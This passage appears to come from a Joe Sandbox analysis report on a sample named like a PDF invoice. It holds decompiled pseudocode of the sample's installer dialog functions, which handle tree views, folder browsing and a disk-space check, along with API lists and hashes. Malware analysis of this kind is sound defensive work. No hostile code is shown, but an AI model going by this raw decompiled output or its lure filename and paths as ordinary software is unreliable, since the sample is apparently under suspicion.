											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404C3B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404CBB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a268;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a26c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, "true");
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404BF6(0x3ff, 0xfffffffb, E00404C0E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a26c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2a0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004052E5);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406234(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004042D6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004042D6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a26c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x423720 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a26c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040430B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040430B(_v12);
								L91:
								return E0040433D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}




























































                                                                      0x00404cfc
                                                                      0x00404d0d
                                                                      0x00404d12
                                                                      0x00404d1a
                                                                      0x00404d20
                                                                      0x00404d28
                                                                      0x00404d36
                                                                      0x00404d39
                                                                      0x00404f5a
                                                                      0x00404f61
                                                                      0x00404f75
                                                                      0x00404f63
                                                                      0x00404f65
                                                                      0x00404f68
                                                                      0x00404f69
                                                                      0x00404f70
                                                                      0x00404f70
                                                                      0x00404f81
                                                                      0x00404f8f
                                                                      0x00404f92
                                                                      0x00404fa8
                                                                      0x0040501d
                                                                      0x00405020
                                                                      0x00405022
                                                                      0x0040502c
                                                                      0x0040503a
                                                                      0x0040503a
                                                                      0x0040503c
                                                                      0x00405046
                                                                      0x0040504c
                                                                      0x0040504f
                                                                      0x00405052
                                                                      0x0040506d
                                                                      0x00405054
                                                                      0x0040505e
                                                                      0x0040505e
                                                                      0x00405052
                                                                      0x00405046
                                                                      0x00000000
                                                                      0x00405020
                                                                      0x00404fad
                                                                      0x00404fb8
                                                                      0x00404fbd
                                                                      0x00404fc4
                                                                      0x00404fc9
                                                                      0x00404fcd
                                                                      0x00404fd8
                                                                      0x00404fd8
                                                                      0x00404fdc
                                                                      0x00404fe0
                                                                      0x00404fe4
                                                                      0x00404ff7
                                                                      0x00404fe6
                                                                      0x00404fe6
                                                                      0x00404fed
                                                                      0x00404ff3
                                                                      0x00404fef
                                                                      0x00404fef
                                                                      0x00404fef
                                                                      0x00404fed
                                                                      0x00404ffb
                                                                      0x00404ffd
                                                                      0x00405010
                                                                      0x00405013
                                                                      0x00405016
                                                                      0x00405016
                                                                      0x00404fe0
                                                                      0x00000000
                                                                      0x00404fcd
                                                                      0x00404faf
                                                                      0x00404fb6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405070
                                                                      0x00405070
                                                                      0x00405077
                                                                      0x004050e8
                                                                      0x004050f0
                                                                      0x004050f8
                                                                      0x004050f8
                                                                      0x00405101
                                                                      0x00405103
                                                                      0x0040510a
                                                                      0x0040510d
                                                                      0x0040510d
                                                                      0x00405113
                                                                      0x0040511a
                                                                      0x0040511d
                                                                      0x0040511d
                                                                      0x00405123
                                                                      0x00405129
                                                                      0x0040512f
                                                                      0x0040512f
                                                                      0x0040513c
                                                                      0x00405292
                                                                      0x00405299
                                                                      0x004052b6
                                                                      0x004052bc
                                                                      0x004052ce
                                                                      0x004052ce
                                                                      0x00000000
                                                                      0x00405142
                                                                      0x00405144
                                                                      0x00405149
                                                                      0x0040514e
                                                                      0x00405153
                                                                      0x00405155
                                                                      0x00405155
                                                                      0x00405156
                                                                      0x00405157
                                                                      0x00405159
                                                                      0x00405159
                                                                      0x00405161
                                                                      0x004051a2
                                                                      0x004051a4
                                                                      0x004051b4
                                                                      0x004051b7
                                                                      0x004051bc
                                                                      0x004051c3
                                                                      0x004051c6
                                                                      0x00405268
                                                                      0x0040526e
                                                                      0x0040527c
                                                                      0x0040528d
                                                                      0x0040528d
                                                                      0x00000000
                                                                      0x0040527c
                                                                      0x004051cc
                                                                      0x004051cf
                                                                      0x004051d5
                                                                      0x004051da
                                                                      0x004051dc
                                                                      0x004051de
                                                                      0x004051e4
                                                                      0x004051eb
                                                                      0x004051f0
                                                                      0x004051f7
                                                                      0x004051fa
                                                                      0x004051fa
                                                                      0x00405201
                                                                      0x0040520d
                                                                      0x00405211
                                                                      0x00405213
                                                                      0x00405213
                                                                      0x00405203
                                                                      0x00405205
                                                                      0x00405205
                                                                      0x00405233
                                                                      0x0040523f
                                                                      0x0040524e
                                                                      0x0040524e
                                                                      0x00405250
                                                                      0x00405253
                                                                      0x0040525c
                                                                      0x00000000
                                                                      0x00405163
                                                                      0x0040516e
                                                                      0x00405171
                                                                      0x00405176
                                                                      0x00405178
                                                                      0x0040517c
                                                                      0x0040518c
                                                                      0x00405196
                                                                      0x00405198
                                                                      0x0040519b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040517e
                                                                      0x0040517e
                                                                      0x00405184
                                                                      0x00405186
                                                                      0x00405186
                                                                      0x00405187
                                                                      0x00405188
                                                                      0x00000000
                                                                      0x0040517e
                                                                      0x00405161
                                                                      0x0040513c
                                                                      0x0040507f
                                                                      0x00000000
                                                                      0x00405095
                                                                      0x0040509f
                                                                      0x004050a4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004050b6
                                                                      0x004050bb
                                                                      0x004050c7
                                                                      0x004050c7
                                                                      0x004050c9
                                                                      0x004050d8
                                                                      0x004050da
                                                                      0x004050de
                                                                      0x004050e1
                                                                      0x00000000
                                                                      0x004050e1
                                                                      0x0040507f
                                                                      0x00404d3f
                                                                      0x00404d44
                                                                      0x00404d4d
                                                                      0x00404d54
                                                                      0x00404d62
                                                                      0x00404d6d
                                                                      0x00404d73
                                                                      0x00404d81
                                                                      0x00404d95
                                                                      0x00404d9a
                                                                      0x00404da7
                                                                      0x00404dac
                                                                      0x00404dc2
                                                                      0x00404dd3
                                                                      0x00404de0
                                                                      0x00404de0
                                                                      0x00404de3
                                                                      0x00404de9
                                                                      0x00404deb
                                                                      0x00404dee
                                                                      0x00404df3
                                                                      0x00404df8
                                                                      0x00404dfa
                                                                      0x00404dfa
                                                                      0x00404e1a
                                                                      0x00404e1a
                                                                      0x00404e1c
                                                                      0x00404e1d
                                                                      0x00404e22
                                                                      0x00404e25
                                                                      0x00404e28
                                                                      0x00404e2c
                                                                      0x00404e31
                                                                      0x00404e36
                                                                      0x00404e3a
                                                                      0x00404e3f
                                                                      0x00404e44
                                                                      0x00404e46
                                                                      0x00404e4e
                                                                      0x00404f19
                                                                      0x00404f2c
                                                                      0x00000000
                                                                      0x00404e54
                                                                      0x00404e57
                                                                      0x00404e5a
                                                                      0x00404e5d
                                                                      0x00404e5d
                                                                      0x00404e64
                                                                      0x00404e6a
                                                                      0x00404e6d
                                                                      0x00404e73
                                                                      0x00404e74
                                                                      0x00404e79
                                                                      0x00404e82
                                                                      0x00404e89
                                                                      0x00404e8c
                                                                      0x00404e8f
                                                                      0x00404e92
                                                                      0x00404ece
                                                                      0x00404ef7
                                                                      0x00404ed0
                                                                      0x00404edd
                                                                      0x00404edd
                                                                      0x00404e94
                                                                      0x00404e97
                                                                      0x00404ea6
                                                                      0x00404eb0
                                                                      0x00404eb8
                                                                      0x00404ebf
                                                                      0x00404ec7
                                                                      0x00404ec7
                                                                      0x00404e92
                                                                      0x00404efd
                                                                      0x00404efe
                                                                      0x00404f0a
                                                                      0x00404f0a
                                                                      0x00404f17
                                                                      0x00404f32
                                                                      0x00404f36
                                                                      0x00404f53
                                                                      0x00404f58
                                                                      0x00000000
                                                                      0x00404f38
                                                                      0x00404f3d
                                                                      0x00404f46
                                                                      0x004052d0
                                                                      0x004052e2
                                                                      0x004052e2
                                                                      0x00404f36
                                                                      0x00000000
                                                                      0x00404f17
                                                                      0x00404e4e

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                                      • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                                      • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                                      • GlobalFree.KERNEL32(?), ref: 0040511D
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 0040526E
                                                                      • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                                      • ShowWindow.USER32(00000000), ref: 004052CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                                      • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                                      • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                                      • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404771 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 78%
                                                                      			E00404771(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700; // 0x4cd37c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040593B(0x3fb, _t146);
					E004064A6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040593B(0x3fb, _t146);
							if(E00405CCE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406212(0x4216f8, _t146);
							_t87 = E004065EC("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406212(0x4216f8, _t146);
								_t89 = E00405C71(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C12(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404C0E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404BF6(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404B2D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004042F8(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E00404706();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404AC7;
							_v56 = _t146;
							_v68 = E00406234(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere") {
									E00406234(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405C3D(_t146) != 0 && E00405C71(_t146) == 0) {
						E00405BC6(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E004042D6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D6(_t167);
					E0040430B(_t166);
					_t138 = E004065EC(6);
					if(_t138 == 0) {
						L53:
						return E0040433D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}













































                                                                      0x00404771
                                                                      0x00404777
                                                                      0x0040477d
                                                                      0x0040478a
                                                                      0x00404798
                                                                      0x0040479b
                                                                      0x004047a3
                                                                      0x004047a9
                                                                      0x004047a9
                                                                      0x004047b5
                                                                      0x004047b8
                                                                      0x00404826
                                                                      0x0040482d
                                                                      0x00404904
                                                                      0x0040490b
                                                                      0x0040491a
                                                                      0x0040491a
                                                                      0x0040491e
                                                                      0x00404928
                                                                      0x00404935
                                                                      0x00404937
                                                                      0x00404937
                                                                      0x00404945
                                                                      0x0040494c
                                                                      0x00404953
                                                                      0x00404956
                                                                      0x00404992
                                                                      0x00404994
                                                                      0x0040499a
                                                                      0x0040499f
                                                                      0x004049a3
                                                                      0x004049a5
                                                                      0x004049a5
                                                                      0x004049c1
                                                                      0x00000000
                                                                      0x004049c3
                                                                      0x004049c6
                                                                      0x004049d4
                                                                      0x004049da
                                                                      0x004049db
                                                                      0x004049de
                                                                      0x004049e1
                                                                      0x00000000
                                                                      0x004049e1
                                                                      0x00404958
                                                                      0x0040495a
                                                                      0x0040495e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404960
                                                                      0x00404960
                                                                      0x0040496d
                                                                      0x00404972
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404976
                                                                      0x00404978
                                                                      0x00404978
                                                                      0x00404981
                                                                      0x00404983
                                                                      0x00404988
                                                                      0x0040498b
                                                                      0x00404990
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404990
                                                                      0x004049ed
                                                                      0x004049f7
                                                                      0x004049fa
                                                                      0x004049fd
                                                                      0x00404a04
                                                                      0x00404a04
                                                                      0x00404a06
                                                                      0x00404a06
                                                                      0x00404a0b
                                                                      0x00404a0d
                                                                      0x00404a15
                                                                      0x00404a1c
                                                                      0x00404a1e
                                                                      0x00404a29
                                                                      0x00404a29
                                                                      0x00404a1e
                                                                      0x00404a39
                                                                      0x00404a43
                                                                      0x00404a4b
                                                                      0x00404a66
                                                                      0x00404a4d
                                                                      0x00404a56
                                                                      0x00404a56
                                                                      0x00404a4b
                                                                      0x00404a6b
                                                                      0x00404a70
                                                                      0x00404a75
                                                                      0x00404a7e
                                                                      0x00404a7e
                                                                      0x00404a87
                                                                      0x00404a89
                                                                      0x00404a89
                                                                      0x00404a95
                                                                      0x00404a9d
                                                                      0x00404aa7
                                                                      0x00404aa7
                                                                      0x00404aac
                                                                      0x00000000
                                                                      0x00404aac
                                                                      0x00404956
                                                                      0x0040490d
                                                                      0x00404914
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404914
                                                                      0x00404833
                                                                      0x0040483c
                                                                      0x00404856
                                                                      0x0040485b
                                                                      0x00404865
                                                                      0x0040486c
                                                                      0x00404878
                                                                      0x0040487b
                                                                      0x0040487e
                                                                      0x00404885
                                                                      0x0040488d
                                                                      0x00404890
                                                                      0x00404894
                                                                      0x0040489b
                                                                      0x004048a3
                                                                      0x004048fd
                                                                      0x004048a5
                                                                      0x004048a6
                                                                      0x004048ad
                                                                      0x004048b7
                                                                      0x004048bf
                                                                      0x004048cc
                                                                      0x004048e0
                                                                      0x004048e4
                                                                      0x004048e4
                                                                      0x004048e0
                                                                      0x004048e9
                                                                      0x004048f6
                                                                      0x004048f6
                                                                      0x004048a3
                                                                      0x00000000
                                                                      0x0040485b
                                                                      0x00404849
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040484f
                                                                      0x00000000
                                                                      0x004047ba
                                                                      0x004047c7
                                                                      0x004047d0
                                                                      0x004047dd
                                                                      0x004047dd
                                                                      0x004047e4
                                                                      0x004047ea
                                                                      0x004047f3
                                                                      0x004047f6
                                                                      0x004047f9
                                                                      0x00404801
                                                                      0x00404804
                                                                      0x00404807
                                                                      0x0040480d
                                                                      0x00404814
                                                                      0x0040481b
                                                                      0x00404ab2
                                                                      0x00404ac4
                                                                      0x00404821
                                                                      0x00404824
                                                                      0x00000000
                                                                      0x00404824
                                                                      0x0040481b

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004048E4
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
